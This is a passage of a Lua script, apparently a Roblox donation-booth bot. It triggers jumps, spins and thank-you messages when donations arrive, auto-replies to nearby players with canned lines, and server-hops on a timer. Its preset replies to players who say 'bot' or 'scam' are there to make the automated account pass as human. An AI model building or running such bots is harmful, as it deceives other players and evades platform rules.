                    spin.AngularVelocity = Vector3.new(0, spin.AngularVelocity.Y + (raised/3)*_G.settings.spinSpeedMultiplier, 0)
                end
                if _G.settings.donationJump and player.Character then
                    task.spawn(function() for i=1, raised * tonumber(_G.settings.jumpsPerRobux) do player.Character.Humanoid:ChangeState(Enum.HumanoidStateType.Jumping) task.wait(0.5) end end)
                end
                if _G.settings.autoThanks then
                    task.spawn(function() task.wait(tonumber(_G.settings.thanksDelay) or 3); local tMsgs = splitString(_G.settings.thanksMessage); if #tMsgs > 0 then chat(tMsgs[math.random(#tMsgs)]) end end)
                end
                RaisedC = newRaisedFormat.Value
                task.wait(tonumber(_G.settings.textUpdateDelay) or 30)
                updateBoothText()
            end)
            updateBoothText()
        end
    end
end)

-- ==========================================
--  BACKGROUND LOOPS (REPLY & HOP)
-- ==========================================
local messagesToResp = { "hi", "hello", "hey", "sup", "yo", "howdy", "sup bro", "sup dude", "hai", "hii", "hey man", "hiya", "heyy" }
Players.PlayerChatted:Connect(function(event_type, p, message)
    local msg = string.lower(message)
    if p == player or _G.settings.autoNearReply == false or string.find(msg, "donates") then return end
    if p:GetAttribute("respcd") then return end
    pcall(function() p:SetAttribute("respcd", true) end)

    local pChar = p.Character
    if pChar and pChar:FindFirstChild("Humanoid") and player.Character and player.Character:FindFirstChild("Humanoid") then
        if (pChar.Humanoid.RootPart.Position - player.Character.Humanoid.RootPart.Position).Magnitude < 11 then
            local reply = nil
            if table.find(messagesToResp, msg) then reply = splitString(_G.settings.helloResponce)[math.random(#splitString(_G.settings.helloResponce))]
            elseif string.find(msg, "bot") then reply = splitString(_G.settings.botResponce)[math.random(#splitString(_G.settings.botResponce))]
            elseif string.find(msg, "donate") then reply = splitString(_G.settings.donateResponce)[math.random(#splitString(_G.settings.donateResponce))]
            elseif string.find(msg, "scam") then reply = splitString(_G.settings.scamResponce)[math.random(#splitString(_G.settings.scamResponce))]
            elseif not _G.settings.autoReplyNoRespond then reply = splitString(_G.settings.otherResponce)[math.random(#splitString(_G.settings.otherResponce))] end
            if reply then task.wait(2.1); chat(reply) end
        end
    end
    task.wait(math.random(12, 18))
    pcall(function() p:SetAttribute("respcd", false) end)
end)

task.spawn(function()
    while task.wait((tonumber(_G.settings.serverHopDelay) or 15) * 60) do
        if _G.settings.serverHopToggle then serverHop() end
    end
end)
